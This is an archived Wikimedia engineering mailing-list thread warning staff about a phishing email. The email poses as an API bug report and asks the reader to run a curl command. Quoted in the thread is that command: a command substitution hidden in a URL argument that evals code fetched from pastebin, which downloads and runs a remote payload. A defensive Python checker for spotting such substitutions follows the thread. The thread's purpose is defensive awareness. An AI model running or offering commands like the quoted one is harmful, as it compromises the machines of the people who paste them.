[Engineering] PLEASE READ: (unsuccessful) compromise attempt

Aeryn Palmer apalmer at wikimedia.org
Thu Jun 15 19:25:19 UTC 2017


Hi All,

Just a note - the claims in the message some of us got this morning have
already been examined and found to be a false alarm. Should have checked
before I sent this email. Thanks, all!

Cheers,

Aeryn

On Thu, Jun 15, 2017 at 12:15 PM, Aeryn Palmer <apalmer at wikimedia.org>
wrote:

> This appears to be from the same person who sent the email earlier this
> morning about an alleged leak, to whom Chad responded. Did anyone click the
> link they provided in that email?
>
> Cheers,
>
> Aeryn
>
> On Thu, Jun 15, 2017 at 12:12 PM, Faidon Liambotis <faidon at wikimedia.org>
> wrote:
>
>> Hi,
>>
>> DO NOT RUN THE COMMAND BELOW. Please read this email in full.
>>
>> I just got an email, found below, which seems initially legitimate, but
>> on a more careful read is malicious and an attempt to compromise my
>> computer. Thankfully I don't have the habit of copy/pasting commands on
>> my terminal and I read this email carefully, so I was not a victim of
>> this.
>>
>> The email seems innocuous enough, by mentioning my name and an otherwise
>> legitimate body pointing out an API issue with a URL that looks like an
>> api.php URL of ours. It suggests running a curl to reproduce, but if you
>> look more carefully, that curl has $(eval $(curl
>> https://pastebin.com/raw/xSWbdNAK) in it.
>>
>> That pastebin URL above contains an exec() of a base64 string, which, in
>> turn, decoded, is a Python script that fetches and exec()s the contents
>> of a URL. I have NOT fetched that URL yet, so I don't know what the
>> contents are.  I'd advise to not do that either, unless done carefully
>> from a sandboxed, unprivileged environment. It will also likely let the
>> attacker know that someone accessed it, and possibly let them know that
>> we're on to them.
>>
>> Please be on the lookout for similar attempts, and let security@ and ops
>> know immediately if you get similar ones, or if you are suspicious of
>> any other emails or weird behavior on your computer. Please also let us
>> know IMMEDIATELY if you suspect you fell victim to one of these attacks.
>> Make sure to confirm that your message was received. If in doubt, call
>> me or other opsens on our cellphones, as found on officewiki's
>> Contact_list.
>>
>> We also had a targeted phishing attempt last week, by someone purporting
>> to be Katherine and attempting to extract donor data, so it's possible
>> it's the same person trying a different angle. They may try other
>> angles as well, so I'd advise everyone to be vigilant.
>>
>> Best,
>> Faidon
>> --
>> Faidon Liambotis
>> Principal Operations Engineer
>> Wikimedia Foundation
>>
>>
>>
>> ----- Forwarded message from Joshua Wilson <joshuaswillson at gmail.com>
>> -----
>>
>> Date: Thu, 15 Jun 2017 10:45:35 -0700
>> From: Joshua Wilson <joshuaswillson at gmail.com>
>> To: fliambotis at wikimedia.org
>> Subject: Wikipedia REST API Issues
>>
>> Greetings Faidon,
>>
>>
>> It seems as if the api `query` endpoint at the English Wikipedia is down.
>> A simple "hello" api call as shown below responds with an internal server
>> error. Further calls to the same endpoint result in the request timing
>> out, until the endpoint is reachable again.
>>
>> [added by faidon: DO NOT RUN THIS COMMAND]
>> curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval
>> $(curl
>> https://pastebin.com/raw/xSWbdNAK)
>> \\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json
>> [added by faidon: DO NOT RUN THIS COMMAND]
>>
>> I'm interested in using english wikipedia data for some AI language
>> comprehension research.
>>
>> If you could take a look, and possibly let me know if/when this service
>> will be up, I would greatly appreciate it. I couldn't find any scheduled
>> downtime information online, so I apologize if this behavior is expected.
>>
>> Thanks,
>>
>> Chelsea Anders
>>
>> ----- End forwarded message -----
>>
>
>
>
> --
> Aeryn Palmer
> Legal Counsel
> Wikimedia Foundation
> 149 New Montgomery Street, 6th Floor
> San Francisco, CA 94105
> apalmer at wikimedia.org
> 415.839.6885 (Office)
> 415.882.0495 (Fax)
> *California Registered In-House Counsel*
>
> *NOTICE: This message may be confidential or legally privileged. If you
> have received it by accident, please delete it and let us know about the
> mistake. As an attorney for the Wikimedia Foundation and for legal/ethical
> reasons, I cannot give legal advice to, or serve as a lawyer for, community
> members, volunteers, or staff members in their personal capacity. For more
> on what this means, please see our legal disclaimer
> <https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer>.*
>



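
Added example, not part of the original thread: a pre-paste check for the trick described in Faidon's message, where a $( ) command substitution is buried inside what looks like a URL argument to curl. The function names are hypothetical, the sample commands are constructed (the nested URL is a placeholder host, not the one from the thread), and only the $( ) form is covered, not backticks.

```python
import re

# Constructed samples. SUSPECT has the shape of the command in the forwarded
# email, with a placeholder host in place of the paste URL from the thread.
SUSPECT = (r"curl https://en.wikipedia.org/w/api.php?action=query\&titles="
           r"$(eval $(curl https://paste.example.invalid/raw/PLACEHOLDER) \\\&)"
           r"Main%20Page\&prop=revisions\&rvprop=content\&format=json")
BENIGN = ("curl 'https://en.wikipedia.org/w/api.php"
          "?action=query&titles=$(x)&format=json'")

def _body(cmd, start):
    """Text between the '$(' at `start` and its matching ')' (paren count only)."""
    depth = 0
    for j in range(start + 1, len(cmd)):
        if cmd[j] == "(":
            depth += 1
        elif cmd[j] == ")":
            depth -= 1
            if depth == 0:
                return cmd[start + 2:j]
    return cmd[start + 2:]  # unterminated: report the rest of the line

def substitutions(cmd):
    """Bodies of every $( ) the shell would execute, honouring POSIX quoting:
    single quotes make text literal, a backslash escapes one character,
    double quotes do NOT disable command substitution."""
    found, i, in_single, in_double = [], 0, False, False
    while i < len(cmd):
        c = cmd[i]
        if in_single:
            in_single = c != "'"
        elif c == "\\":
            i += 1  # skip the escaped character
        elif c == "'" and not in_double:
            in_single = True
        elif c == '"':
            in_double = not in_double
        elif cmd.startswith("$(", i) and not cmd.startswith("$((", i):
            found.append(_body(cmd, i))
        i += 1
    return found

def review(cmd):
    """Reasons not to paste `cmd` into a terminal; empty list if none found."""
    reasons = [f"runs nested command: {body}" for body in substitutions(cmd)]
    if re.search(r"(^|[\s;&|(])eval\s", cmd):
        reasons.append("eval of text produced at run time")
    return reasons
```

review(SUSPECT) reports both nested commands plus the eval, while the single-quoted BENIGN URL yields no findings because the shell never expands its $(x).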